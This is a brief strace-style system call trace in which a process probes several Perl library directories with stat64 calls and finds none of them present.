10019 07:30:57.593425 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfcfc660) = -1 ENOENT (No such file or directory)

10019 07:30:57.593425 stat64("/usr/local/lib/perl/5.8.7", 0xbfcfc7a0) = -1 ENOENT (No such file or directory)

10019 07:30:57.593426 stat64("/usr/local/share/perl/5.8.7", 0xbfcfc7a0) = -1 ENOENT (No such file or directory)

10019 07:30:57.593426 stat64("/usr/local/lib/perl/5.8.6", 0xbfcfc7a0) = -1 ENOENT (No such file or directory)

